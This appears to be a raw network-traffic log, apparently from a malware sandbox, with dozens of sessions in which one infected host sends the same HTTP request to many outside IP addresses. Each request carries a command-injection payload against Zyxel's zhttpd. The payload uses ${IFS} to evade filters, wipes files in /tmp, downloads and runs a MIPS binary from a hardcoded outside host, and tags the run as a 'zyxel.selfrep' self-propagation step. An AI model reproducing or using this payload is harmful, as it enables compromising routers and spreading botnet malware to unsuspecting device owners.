                                                        Jan 28, 2024 10:12:42.199259043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1755192.168.2.144755237.237.51.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199286938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1756192.168.2.145232079.137.56.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199325085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1757192.168.2.1439496158.51.62.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199376106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1758192.168.2.1459900167.130.117.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199400902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1759192.168.2.1459594119.67.188.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199434996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1760192.168.2.1452856122.76.65.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199470043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1761192.168.2.1457278188.199.157.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199496031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1762192.168.2.1443432176.2.89.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199563980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1763192.168.2.144849693.144.101.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199585915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1764192.168.2.1440718148.77.202.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199647903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1765192.168.2.1446848100.51.220.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199686050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1766192.168.2.1433932130.32.20.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199717999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1767192.168.2.1444348220.141.254.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199771881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1768192.168.2.1437910141.3.60.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199806929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1769192.168.2.1457086147.220.156.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199831009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1770192.168.2.1458966185.91.216.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199887037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1771192.168.2.1438868111.212.216.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199937105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1772192.168.2.145683813.127.230.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199959993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1773192.168.2.144777679.110.117.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200002909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1774192.168.2.14428969.187.111.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200052023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1775192.168.2.143896047.55.231.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200087070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1776192.168.2.1434766178.246.223.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200114012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1777192.168.2.1439468141.118.131.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200150967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1778192.168.2.144879468.66.179.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200193882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1779192.168.2.1442470182.14.192.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200252056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1780192.168.2.1445080189.148.14.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200270891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1781192.168.2.1459280218.215.171.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200325966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1782192.168.2.1441056188.34.181.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200345993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1783192.168.2.145374086.192.227.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200401068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1784192.168.2.1442086169.212.49.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200460911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1785192.168.2.1434124202.106.80.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200489998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1786192.168.2.145877257.244.84.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200536013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1787192.168.2.1456268196.102.141.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200577021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1788192.168.2.1445222162.164.122.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200607061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1789192.168.2.145268825.209.6.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200654984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1790192.168.2.144326448.220.206.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200675011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1791192.168.2.145224090.131.40.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200711012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1792192.168.2.145554876.106.180.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200762987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1793192.168.2.1444962159.149.80.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200802088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1794192.168.2.1433808110.47.70.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200829983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1795192.168.2.145642272.114.61.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200876951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1796192.168.2.143301812.177.51.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200917959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1797192.168.2.1453540119.223.137.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200975895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1798192.168.2.144089259.93.131.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.200988054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1799192.168.2.143780893.68.223.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201035023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1800192.168.2.14437004.2.110.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201088905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1801192.168.2.1437682186.53.98.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201129913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1802192.168.2.145543812.49.233.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201174021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1803192.168.2.1438056151.61.245.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201206923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1804192.168.2.144344281.70.63.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201241970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1805192.168.2.143530247.50.249.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201281071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1806192.168.2.1444726220.84.224.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201308012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1807192.168.2.1440896154.245.28.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201340914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1808192.168.2.1432922183.223.66.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201360941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1809192.168.2.1451452152.235.241.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201416016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1810192.168.2.144677831.56.217.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201443911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1811192.168.2.145337064.14.108.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201477051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1812192.168.2.1433526178.122.65.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201504946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1813192.168.2.144355296.246.128.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201565027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1814192.168.2.1456382117.99.57.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201606035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1815192.168.2.144411693.219.36.35443
                                                        TimestampBytes transferredDirectionData
